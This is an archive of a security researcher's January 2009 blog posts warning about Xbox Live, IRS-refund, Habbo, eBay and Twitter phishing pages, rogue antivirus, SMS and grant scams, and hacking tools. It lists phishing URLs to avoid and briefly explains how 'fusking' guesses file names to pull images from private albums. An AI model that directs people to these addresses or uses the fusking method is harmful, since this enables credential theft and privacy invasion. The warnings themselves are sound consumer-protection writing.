Christopher Boyd: January 2009 Archives

How Old?

| | Comments (1)
This XBox Live phish attempt caught my eye:

flu0.gif
Click to Enlarge

It's a lot better looking than many of the others I see, and the phisher took the time to make a fake screenshot to impress you with all the fake money he (doesn't) have. The most interesting thing about it for me is that it references another domain ("Runeflux.com"). Usually they're pretty anonymous.

Anyway, I decided to check out the domain - there's nothing there, could it have been taken down? Well, a quick search later and we have this (rather well edited) Youtube video. Apparently the domain simply hosted the same phishing page, so yes - it's a fair bet someone had it taken offline.

The important part is when you check out the profile of the person who owns the account:


flu3.gif

Yes, our phishing friend is only 14. I've had quite a bit of experience researching people at the younger end of the age spectrum involved in this sort of thing, and I have to say the basic mechanics of "how to phish" are all in place with this kid.....slick websites, Youtube promotion, little touches like fake screenshots....it's all there.

Worrying, isn't it?

Anyway, the URL to avoid here is

h1.ripway.com/microsoftpointsgen/
There seem to be quite a few sites online at present claiming they can give you "online tax refunds", if only you fill in your bank details and click "submit". It's not a good idea, and they look pretty convincing:


irs1.gif
Click to Enlarge

irs2.gif
Click to Enlarge

Some of these domains have been up and down since last night, but I expect some of them will return again so here they are in full:

gicrisis.org/data/refundtax/SearchTAXERR.php

irs-2009.com/refund/refunds.html

collectrefund-irs.com/refund/refunds.html

cimaonline.ca/application/Internal/Revenue/Service/pas.php?certegy_vm=trueportlet_change_1_actionOverrideFchaseonlineFchangeFprocessDetails_windowLabel_portlet_process_pageLabel_page_process

jklabs.cz/phpayv2/admin/import/.secure/www.irs.gov/get-refund/refunds.php?Where_is_my_refund&Get_Refund

A Nice Fixer-Upper

| | Comments (0)
Check out this awesome blog post on the Malware Diaries blog, where a rogue antivirus maker is trying to keep up with the Joneses where their fancy company building is concerned.

They've managed to fail spectacularly...

Timed To Perfection

| | Comments (0)
I just had to share this with you, one of the stranger things I've found recently.

hs1.png

Yes, that says what you think it says. Presumably someone wanted to time themselves cracking into servers and defacing webpages.

Observe:

hs2.png

And in action:

hs3.png

We wait with baited breath for Version 2...
....not really.

fhc1.png
Click to Enlarge

The above is an absolutely hideous phish. Someone clearly needs to hire a real designer from all that stolen Habbo money they must have by now. I think the "Free Habbo Credits" thing was supposed to be clickable (hence the "Proof!" bit), but they seem to have messed that up.

Doh.

The URL to avoid here is

habmanny.tripod.com/id7.html
Fusking. You might have heard the term before, but what is it?

From Wikipedia:

"A Fusker is a type of website or utility that extracts images from a web page, typically from free hosted galleries. Fusker software allows users to identify a sequence of images with a single pattern, for example:

example.com/images/pic[1-16].jpg

This would identify images pic1.jpg, pic2.jpg, through pic16.jpg.

When this pattern is given to a fusker website, the website would produce a page that displays all sixteen images in that range."


In other words, it's the same as visiting a website, assuming the images are numbered sequentially (1.jpg, 2.jpg, 3.jpg...) then manually changing the last part of the URL to cycle through them all. Fuskers do the same thing, but on a potentially much bigger scale.

Well, a few days ago I came across something called "Photof*cket" (this is a worksafe blog, hence the blanking out)...designed to grab images from Photobucket (you can see what they did there). It seems to have been around for quite some time, but I must admit it's the first I've seen of it.

pf.png
Click to Enlarge

pf2.png
Click to Enlarge

pf3.png
Click to Enlarge

From the Documentation:

"The core functionality of PhotoF*cket is to download content from public and private PhotoBucket albums.

Main Features

Rip Public Albums - PhotoF*cket can download all the content from a public album quickly and easily.

Rip Private Albums (with password) - If you have the password to a private account, PhotoF*cket can download all the content from the album just as quickly and easily as if it were a public album.

Fusk Private Albums (without password) - PhotoF*cket can attempt to download the content of a private album using a brute-force method called "fusking," where the software tries to download content by guessing the names of files that might be in the private album."


That last part is particularly interesting - and like I said in the title, simply leaving your pictures as "img1 / picture1 / img_1" etc before uploading them to your "Private" galleries is probably a bad idea. Fuskers will go looking for the most common naming schemes - giving your images custom titles makes it that little bit harder for people to grab them. Of course, my own thought on this is that if your image is personal enough that you have to put it in a private gallery at all, then you likely shouldn't be putting it online in the first place.

You never know who is poking around - or (more importantly) how they're doing it...
This tale starts with a random (and entirely unrelated) advert placed on a forum:

pg1.jpg

As you probably guessed already, their "Mom" in "Tamworth" doesn't actually exist. Click the ad, and...

pg2.jpg
Click to Enlarge

You're dropped into a game of multiple choice, except its rigged in your favour. Regardless of which door you select, you'll see this:

pg3.jpg

Seriously, I picked the "winner" eleven times out of eleven. If I was that good, I'd be in Vegas, not playing "guess the right door to win an iPhone".

Let's see, fake unrelated advert to get you here, rigged game that removes the possibility of losing (they can't make money if you lose, right?) I'm loving the site so far. Anyone signing up to stand a chance of winning had better love spending lots of money on phone bills too - check out the price of this particular service:

"This is a subscription service, it will cost ?10 ($13) per week (plus ?5 set up fee), max 4 items per week, until you send STOP to 85115."


Ouch.

Of course, you could save the money you'd be about to waste on random phone lotteries and save up to buy one instead, but that would be just too sensible...
There are many Microsoft XBox Live scams out there - many involve increasingly sophisticated "fake points generators" (which claim to produce "free" Microsoft points used to purchase downloads and other items, only to steal your login details).

However, some are so amazingly breathtaking with regards what they ask the end-user to do, it's somewhat miraculous anybody would actually fall for them.

This is one such scam, currently doing the rounds on Youtube. Our video begins:

dup1.jpg

...wait, how to duplicate the Microsoft points you already paid for? Wow. That's going to be pretty impressive. First though, we need to throw in some cod-technical speak to confuse the masses and make this seem more legit:

dup2.jpg

Yep, that'll do it. Poor old "Microsoft generator", whatever that is. It goes on:

"To do this, you'll need the following items..."


dup3.jpg

Must be an "unused card" (in other words, one that you've already purchased), eh? I wonder why. Let's see where this goes....

dup4.jpg

...EMail? They're not going to ask people to do what I think they're going to ask them to do, are they?

dup5.jpg

...whoops, they are. In a nutshell, you run out, buy your Microsoft points, then EMail a random stranger your (unused) code, along with some more cod-technical nonsense in the body of the mail that supposedly makes this "generator" create a duplicate of your unused code. You then presumably skip into the Sunset, armed with twice the points you started out with and go on a massive spending spree.

The alternate theory would be that you buy a code, then EMail it to a random stranger and they simply use it for free, at your own expense, leaving you with nothing.

Surely not...!
Here's an interesting website:

Obamastimulusprogram.com

Registered anonymously, the splashpage is particularly slick looking:

ob1.gif
Click to Enlarge

"Immediate Action To Help You

Tax cuts are one means of providing economic relief to those in need and will be part of the recovery plan for America. However, Government Grants will also play a vital role as a means to swiftly provide assistance to those who could use financial assistance. Unlike a loan these Government Grants provide funds which do not need to be repaid and can be used for virtually any purpose including:

    * pay off many forms of debt
    * consolidate debt
    * provide mortgage assistance or prevent foreclosure
    * purchase a new home
    * start a new business or assist with an existing business
    * pay off student loans or assist new students with obtaining a degree

If there is a bill out there that needs to be paid there is most likely funding now available that will be able to cover it."


Scroll down, and you're told that "Demand is expected to be very high for these programs, so although billions have been set aside, unfortunately the funds will only last for a limited period of time."

The only thing left to do is hit the big red "Request free Government funds" button, and see....

ob3.gif
Click to Enlarge

...an iPhone offer, which is the first indication the Obama Stimulus site isn't "official" but rather the product of an ad network. Sure enough, change your system settings to make them think you're in an area eligible for the offer and...

ob5.jpg
Click to Enlarge

You see yet another slick looking page entitled "Grant Danger" (with logos from CNN, CBS, Fox and Yahoo! at the top to make the site look more official - while Obamas stimulus program itself has been in the news, I doubt this website has), and beneath that, lots of pictures of people smiling in front of their grant paid homes, grant paid credit card debts and some guy who was given $175,000 to "invent a machine to glue fabric together" (never heard of Copydex? Oh well).

Also, note the entirely false "countdown timer" that only gives you ten minutes to fill in the form. Quick! Before it reaches zero, and....absolutely nothing happens.

Well, there's a surprise.

What they want you to do is send them $2.95 shipping & handling, for which they'll send you some "information" on how to obtain said Government loans. Now, I'm not massively up on American Government Loans, but if I really wanted one, couldn't I just contact a Government Loans Department for free rather than giving $2.95 to some random people on the Net without even knowing what I'm paying for upfront?

A tidy profit could be made in this area, especially with the whole "credit crunch / we're all doomed" scenario playing out at the moment. Throw in a useless countdown timer, splash phrases like "Grant Danger" and "millions in free grants will be lost" all over the place and you're probably onto a winner.

Oh, might want to check those T&Cs before you send off for this "offer".

Furthermore, any free trials that may or may not be offered with this product are only free during the said allotted time of the free trial period as outlined within the product sales page, confirmation of order page, and confirmation email. If you have not cancelled the free bonus within the 7 day trial period (if offered on product purchasing), you are agreeing to purchase the bonus material and/or service at a monthly reoccurring cost. The resource center is billed at $58.61 monthly.

Is that applicable here? I've no idea, but I don't intend to find out by trying to grab me some "free" money. I'm fine with my useless "free iPod" offers, thanks...

Yahoo! Games "Fun"...

| | Comments (0)
There seem to be quite a few phishes doing the rounds for Yahoo! Games All-Star Central at the moment.

yphish.gif
Click to Enlarge

hotpicts.idoo.com

Would appear to fit the bill nicely. A colleague tells me there were many of these live yesterday, but most are now offline. As always, be careful with your logins...
Not much content to the linked article, but somewhat disturbing anyway.
If you go hunting for free Batman games (probably not a good idea given what happened last time), then you'll see something like this in Google search results:

freebatmangame.jpg


If you click the second link, which is

free-downloadable.ilona.biz.st/free-batman-game.html

...you'll immediately be redirected to a rogue antispyware scanner, in this case to Antivirus 2009.

av20091.jpg
Click to Enlarge

I particularly liked the message in the box near the bottom of the screen while the fake scan is running:

treats.jpg

No, anything but that!
We've heard reports of a couple of these websites currently doing the rounds - they call themselves "Microsoft Points Heaven", and usually sit on free hosting domains. They promise you "free" Microsoft points, then ask you to enter your Live login details. At that point, your data has been stolen.

mph1.jpg
Click to Enlarge

If you check the code, you can see you're not "signing in to XBox Live" at all - you're entering your information into a standard submission form, which will send the information you enter directly to the site owner.

wfrm.jpg

The last URL we saw this scam residing at was

microsoftpointheaven.weebly.com

which is now offline. It will no doubt resurface somewhere else, so be on your guard...
I love bizarre fake warning messages.

This one is a little stranger than most, however:

unsoiled.jpg
.
We're seeing quite a lot of these at the moment:

fakecnn1.jpg

The Emails are fake - click the link, and you'll be taken to a website that does pretty much the same thing as these sites from August.

Avoid.

A clever tactic used by spammers to get you to click their links: send an official looking email saying you "unsubscribed" to various services. If enough of them are sent out, eventually you're going to send them to someone who immediately wonders how they managed to unsubscribe from their favourite website / newsletter / whatever.

fakeunsub1.jpg
Click to Enlarge

In this case, hovering over the "Unsubscribe" hyperlink shows that it'll actually send you to

radiovary.com

Which is a fairly typical Viagra website:

viag1.jpg
Click to Enlarge

As always, be suspicious of random "Unsubscribe" messages sent via EMail. If in doubt, hover over the links and check the address it leads to at the bottom. If you're still unsure, just ignore the email and go directly to the website in question. The site here is fairly harmless, but the same technique could easily be applied to email address harvesting and sending you to infection sites.


Wow, this is creepy.

It's an EBay phish page that does two things.

fakeebay1.jpg
Click to Enlarge

The first is that it bizarrely asks you to install a Firefox extension called QIP (as you can see from the yellow bar across the top in the above screenshot), which (as far as I'm aware) is a legitimate Russian extension that allows you to converse with friends across multiple platforms.

fakeebay2.jpg

Call me crazy, but I'm sure most EBay users would immediately think something was wrong if they were presented with a Russian Firefox extension on EBay.

Worse is to come, however. If the end-user should scroll down a little, they're presented with adverts - and they don't exactly convince you that this is the real EBay website. One usually contains a naked woman of some sort. The other? Well, it tends to show a close up of a randomly selected dead womans face, often horribly mutilated.

Yes, I have no idea what's going on here either.

ebayfake3.jpg

 
ebayfake4.jpg

Now I've seen a lot of strange things on EBay. Fake laptops, XBox scams, cash on delivery con-jobs and hacktool packs. However, naked women and dead bodies probably takes first prize (at least it would if this was the real site). Thanks for freaking me out, insane Russian phisher.

In case you're wondering, the adverts all seem to take you to some kind of Russian linkdump, where none of the images relate to the site you're going to end up at. Russian Roulette is indeed the name of the game where that's concerned.

The site to avoid like the plague here is

sadww.sadas.nm.ru/abasdass.htm

The Devilz Return...

| | Comments (0)
The Turkish hacking group NetDevilz have hit the headlines on a number of occasions, most notably last year when they went on a bit of a Photobucket rampage. Well, they're apparently back with a collection of hacking tools. The most interesting is this RFI (remote file inclusion) scanner:

rfi1.jpg
Click to Enlarge

As you've probably already guessed, it hunts for vulnerable websites to exploit. There's also an SQL Scanner, which looks identical:

rf2.jpg
Click to Enlarge

Just to make things more interesting, we've heard some reports that people attempting to use these tools are complaining that they've been Trojaned by a rash of backdoored versions. We saw no evidence of booby traps in either file, but it's entirely possible someone decided to have a little "fun" and own some PCs in the rush to use both of these programs...
Okay, I tried repeatedly to get the site back up and running after it fell to pieces just before Christmas. Unfortunately, I've since discovered that the domain mapping being used to keep the site working was an awful lot more unstable than it had any right to be.

I woke up yesterday to find the site AWOL, and everything behind the scenes was a mess.....again.....for the third time. It seems crazy to keep impacting on my writing duties here by grapping with a website that (for the time being) refuses to play nice, so for now, this is sadly the end of my attempts to bring the site back. It's not fair on readers to be constantly told the "site is back", only to watch it go horribly wrong five minutes later.

It's not a massive problem - it just means the sum total of posts that would have been spread across two sites will now just be on this one site.

Still.....argh.

Spam Wave On SPG

| | Comments (0)
Well, it took a while but we're finally getting to grips with the insane amounts of spam from "Bruno" and "Ricky Martin". If there's any left over, it should be gone shortly.

I don't even like his songs...
(Automatically translated from Italian):

hhack1.jpg
Click to Enlarge

...sadly, as crude as it is you'd be surprised how many people will fall for the old "Send your login to a random Hotmail address" gag. The domain to avoid is

habbohack2.blogspot.com

We came across this tool while researching some gaming hacks:

rs.jpg
Click to Enlarge

This is designed to fool users into thinking they can hack the game in question (in this case, Runescape). Of course, the victim doesn't know that the file will have been bound to a keylogger or other malicious program. Depending on the infection file selected, the end-user could have a very bad day...

Twitter Phish Attacks

| | Comments (0)
There seems to have been an outbreak of phish links dropped onto Twitter in the last day or so.

Messages such as these should be avoided:

hey look at this funny blog rosalierebyb.blogspot.com/

heyy!!! i want u to see my blog!! blogtwitter.access-logins/login


You'll notice the second message (which was sent to a colleague of mine) incorrectly lists the phishpage (it's missing the .com, so the phishers shot themselves in the foot with that one) but the page at

blogtwitter.access-logins.com/login/

is still live at time of writing. More here.

About this Archive

This page is a archive of recent entries written by Christopher Boyd in January 2009.

Christopher Boyd: December 2008 is the previous archive.

Christopher Boyd: February 2009 is the next archive.

Find recent content on the main index or look in the archives to find all content.